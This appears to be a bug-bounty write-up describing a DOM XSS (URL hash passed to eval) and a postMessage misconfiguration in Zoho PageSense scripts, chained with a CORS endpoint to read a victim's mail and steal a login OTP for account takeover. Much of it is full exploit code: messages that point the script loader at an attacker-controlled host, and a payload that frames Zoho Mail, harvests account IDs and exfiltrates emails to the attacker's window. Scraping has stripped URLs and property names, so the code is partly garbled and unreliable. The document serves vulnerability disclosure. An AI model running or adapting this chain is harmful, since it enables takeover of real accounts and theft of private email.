ARTICLE ADHello my name is Anany and in this story, I will discuss how I discovered DOM XSS and POSTMESSAGE Misconfiguration, and how I escalated them to take over the Zoho account. This narrative will be divided into three parts:
DOM XSS at ( Misconfiguration at ( to Account Takeover (ATO)To clarify, The DOM XSS and POSTMESSAGE Misconfiguration are two individual vulnerabilities here, not related to each other. They are separate vulnerabilities xss on and postmessage miconfiguration to xss in, and with either one, we can use Part 3 (ATO) to take over the account.
One of my tool that I used trigger an DOM XSS in the URL
So I decided to look at the JavaScript to find the vulnerable code, Let’s take a look$(document).ready(function(e) {...
var tv_id=window.location.href.split('#');
function autoplay(tar) {
var target_v=eval(tar);
Clear and easy, the script takes the location.href, which is the URL, gets the hash from it, and passes it to eval
In we can see the script 9e..a9.js which include the script a6..5f.js
In the script 9e..a9.js load a6..5f.js lets break it and see what it has
var je = w.getZABQueryKeyValue(window.location.href, "ps_editor"), qe = w.getZABQueryKeyValue(window.location.href, "ps_verifyscript");
je ? function(e, t) {
if (!document.querySelectorAll("#" + t).length) {
var i = document.createElement("script");
(i = w.addNonce(i)).type = "text/javascript", = t,
i.src = e,
}("https://" + h.getTrackingServerUrl() + "/pagesense/initializer/scriptLoader.js", a.SCRIPT_LOADER_ID) : qe ||"qa_mode=true") > -1 ? Fe() : Ce.checkPrivacyConsent()
It checks if the parameter ps_editor in the url or not if yes, the script will load the following script
"https://" + h.getTrackingServerUrl() + "/pagesense/initializer/scriptLoader.js"Let’s load the script/pagesense/initializer/scriptLoader.js and see what it has
...window.addEventListener("message", ps_loader.messageListener);
It just create message EventListenr and sets ps_loader.messageListener as the the callback, so let’s break ps_loader.messageListener
ps_loader.messageListener = function(event) {if ( === "pagesense-scriptloader-message") {
const eventAction =
switch (eventAction) {
case "updateServerDomain": {
case "loadScript": {
var scripts =;
for (var i = 0; i < scripts.length; i++) {
In the callback it checks if the attributeaction in message equal to updateServerDomain or loadScript, It sets the attribute serverDomain in message to the variable SERVER_DOMAIN if the message action attribute is equal to updateServerDomain Or in the case loadScript it gets the attribute scripts from the message and sets it’s value to scripts, and after that it calls ps_load.loadScript with the scripts variable as the arguments
In the callback, it checks if the attribute action in the message is equal to updateServerDomain or loadScript. If the message action attribute is equal to updateServerDomain, it sets the attribute serverDomain in the message to the variable SERVER_DOMAIN.
In loadScriptcase, it retrieves the attribute scripts from the message and sets its value to the variable scripts. After that, it calls ps_load.loadScript with the variable scripts as the arguments.
Here is the code for ps_load.loadScript
ps_loader.loadScript = function(keyname) {var scriptMap = {
editor: SERVER_DOMAIN + "/pagesense/initializer/editor.js", //NO I18N
heatmap: SERVER_DOMAIN + "/js/heatmap.js" //NO I18N
var script_url = scriptMap[keyname];
var h = "http";
var http = ((window.location.protocol.indexOf("https") === -1) ? h + "://" : h + "s://"); // NO I18N
var script = document.createElement("script"); //NO I18N
script.src = "https" + "://" + script_url;
return true;
This is the point where the vulnerability occurs:
The function sets an object variable with two keys, editor and heatmap, and assigns the value of the SERVER_DOMAIN, which has been previously set in ps_loader.messageListener. Additionally, it includes two different script paths: "/pagesense/initializer/editor.js" and "/js/heatmap.js".
Following that, it retrieves the keyname from the scriptMap. The keyname corresponds to the scripts variable set earlier in ps_loader.messageListener. Subsequently, it assigns the value to the variable script_url and proceeds to create a script tag using the script_url variable as the URL.
Let’s say we sent the following message
"scripts":["heatmap or editor"]
The script will examine the action attribute and, depending on the value of action, it will perform the corresponding task. In the case of updateServerDomain, the script will assign the value of the serverDomain to the SERVER_DOMAINvriable, and subsequently, it will return.
If the action attribute in the message is equal to loadScript, the script will create a script tag with the URL based on the following conditions:
If the keyname -> scripts attribute is equal to editor, the script src URL will be SERVER_DOMAIN + "/pagesense/initializer/editor.js".If the keyname -> scripts attribute is equal to heatmap, the script src URL will be SERVER_DOMAIN + "/js/heatmap.js".So we can exploit that by sending a message that sets the variable SERVER_DOMAIN to point to our host and then sending another message to load the script.
In the Escalation process, I will use, not Both do not share the same code and features, doesn’t function like However, the concept of mail that we will discuss later will work in both tld.
I was exploring the and I found that it serve an IFRAME of the URL
What is important here is the parameter frameorigin which will return in Content-Security-Policy: frame-ancestors 'self' which allow to workplace to iframe the, that mean we can specify the iframe parent as we need but in range *
Also I should mention that the mail and workplace communicate with each other using POSTMESSAGE, to set the themes, tracking and other stuff, we need that later
Read mails CORS
When loading mail, zoho mail gets your emails from During this process, I observed the presence of the Access-Control-Allow-Origin header, permitting access to This implies that we can fetch emails from there. However, a challenge arises with the accId parameter, it's the account Id. T here are various methods to obtain this value, the most straightforward approach I discovered after two weeks of experimentation, is through the postmessage.
Whenever there is a change in the location.hash, the mail frame sends a message to the parent. This message contains both the new and old location.hash values. Our goal is to extract specifically the new hash value.
Upon investigation, I did discover the hash #settings/mailaccounts, which navigates to the settings and activates the mailaccounts section. Following this, the mail frame sends a message to the parent, which contains the account IDs
Given our capability to access and read emails, we can gain unauthorized access to a victim’s account. By opting for the OTP (One-Time Password) method instead of using a password, we can initiate the login process. Subsequently, we can read the emails within the account, extracting the OTP received in the process. Finally, we can utilize this obtained OTP to log in to the victim’s account without requiring their password.
<body><div id="email-container"></div>
window.addEventListener("message", function(event) {
if ( && && == "summery") {
const data = JSON.parse(;
const emails = data;
const emailContainer = document.getElementById('email-container');
if (Array.isArray(emails) && emails.length > 1) {
const email = emails[1].mdata;
if (email.FROM && email.SUBJECT && email.SENTTIME) {
const emailDiv = document.createElement('div');
emailDiv.innerHTML = `<strong>From:</strong> $ {email.FROM}<br><strong>Subject:</strong> $ {email.SUBJECT}<br><strong>Date:</strong> $ {email.SENTTIME}<br><strong>Body:</strong>$ {email.CONTENT}<br><br>`;
url = ""
var payload = btoa(`
<div id="herewego">
var stcmessage = false;var rlc = false;var udt = false;var ald = [];
// Data to initialize the mail fram
var data = {"LIBRARY_INSTANTIATED_REPLY":{"fromWp":true,"eventType": "LIBRARY_INSTANTIATED_REPLY","data":{}},"GET_RAIL_TIME_VALUE":{"fromWp":true,"eventType": "GET_RAIL_TIME_VALUE","data":{}},"START_LOADING_RESOURCE":{"fromWp":true,"eventType":"START_LOADING_RESOURCE","data": {}},"ENABLE_SET_NOTIFICATION_COUNT":{"fromWp":true,"eventType": "ENABLE_SET_NOTIFICATION_COUNT","data":{}},"SET_SEARCH_POSITION":{"fromWp":true,"eventType": "SET_SEARCH_POSITION","data":{ "top": "0px", "right": "0px" }},"FEATURE_ENABLED_FLAGS":{"fromWp":true,"eventType": "FEATURE_ENABLED_FLAGS","data":{ "isDragIndicationMarkedAsSeen": false }},"PAGE_VISIBILITY":{"fromWp":true,"eventType":"PAGE_VISIBILITY","data": {"visible":true}},"STOP_LOADING_RESOURCE":{"fromWp":true,"eventType": "STOP_LOADING_RESOURCE","data": {}},"APP_CURRENT_SELECTED_STATUS":{"fromWp":true,"eventType": "APP_CURRENT_SELECTED_STATUS","data":{"isSelected":true}}}
function sendMessageWithDelay(payload, delay) {
setTimeout(function () {
var mailIframe = document.getElementById('mailIframe');
mailIframe.contentWindow.postMessage(payload, '*');
}, delay);
function sendMessageToParent(message) {
window.opener.postMessage(message, '*');
function sendRequest(url) {
return new Promise(function(resolve, reject){var xhr = new XMLHttpRequest();'GET', url, true);xhr.withCredentials = true;xhr.onreadystatechange = function () {if (xhr.readyState == 4) {if (xhr.status == 200) {var response = {"emails": xhr.responseText, "from": "summery", "accId": id};resolve(response);} else {reject(xhr.statusText);}}};xhr.send();});
function resiverMessage(event) {
if ( == "HIDE_LOADING") {
sendMessageWithDelay(data['LIBRARY_INSTANTIATED_REPLY'], 1000);sendMessageWithDelay(data['FEATURE_ENABLED_FLAGS'], 1000);sendMessageWithDelay(data['GET_RAIL_TIME_VALUE'], 1000);sendMessageWithDelay(data['PAGE_VISIBILITY'], 10000);
} else if ( == "SET_NOTIFICATION_COUNT") {
if (!stcmessage) {
// initialize the mail fram
stcmessage = true;sendMessageWithDelay(data['START_LOADING_RESOURCE'], 1000);sendMessageWithDelay(data['ENABLE_SET_NOTIFICATION_COUNT'], 1000);sendMessageWithDelay(data['SET_SEARCH_POSITION'], 1000);sendMessageWithDelay(data['FEATURE_ENABLED_FLAGS'], 1000);sendMessageWithDelay(data['APP_CURRENT_SELECTED_STATUS'], 1000);
} else if ( == "SET_HASH") {
if ( &&"mailaccounts")) {
id ='/')[2];
if (ald.indexOf(id) == -1 && id) {
sendRequest('' + id + '&from=1&to=50&summary=true&sortBy=date&sortOrder=false&folderSpec=0')
.then(function(response) {
emails = JSON.parse(response.emails);
const emailList = emails[1];
emailList.forEach(function(email) {
sendRequest('' + id + '&summary=true&msgId=' + email.M + '&vfc=false&split=true').then(function(response2) {
}).catch(function(error) {
window.addEventListener("message", resiverMessage)
document.getElementById('herewego').innerHTML = '<iframe title="Mail" allow="fullscreen;clipboard-read;clipboard-write;geolocation;microphone;camera;display-capture" allowfullscreen="" class="" style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;" id="mailIframe" src="$ {url}">'
var wv =`'$ {payload}'))`)
Video PoC
Here is the payload for the messages<body>
<div id="email-container"></div>
window.addEventListener("message", function(event) {
if ( && && == "summery") {
const data = JSON.parse(;
const emails = data;
const emailContainer = document.getElementById('email-container');
if (Array.isArray(emails) && emails.length > 1) {
const email = emails[1].mdata;
if (email.FROM && email.SUBJECT && email.SENTTIME) {
const emailDiv = document.createElement('div');
emailDiv.innerHTML = `<strong>From:</strong> $ {email.FROM}<br><strong>Subject:</strong> $ {email.SUBJECT}<br><strong>Date:</strong> $ {email.SENTTIME}<br><strong>Body:</strong>$ {email.CONTENT}<br><br>`;
function sendMessageWithDelay(payload, delay) {
setTimeout(function () {
open_window.postMessage(payload, '*');
}, delay);
var open_window;
open_window ="")
sendMessageWithDelay( {"id":"pagesense-scriptloader-message","action":"updateServerDomain","serverDomain":""},3000)
sendMessageWithDelay( {"id":"pagesense-scriptloader-message","action":"loadScript","scripts":["heatmap"]},5000)
And here is the payload that we should host on of the following files on our host
- https?://
- https?://
url = ""
var stcmessage = false;
var data = {...}
function sendMessageWithDelay(payload, delay) {...}
function sendMessageToParent(message) {...}
function sendRequest(url) {...}
function resiverMessage(event) {...}
window.addEventListener("message", resiverMessage)
var iframe = document.createElement('iframe');
iframe.title = 'Mail';
iframe.allow = 'fullscreen;clipboard-read;clipboard-write;geolocation;microphone;camera;display-capture';
iframe.allowfullscreen = true; = 'position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;'; = 'mailIframe';
iframe.src = url;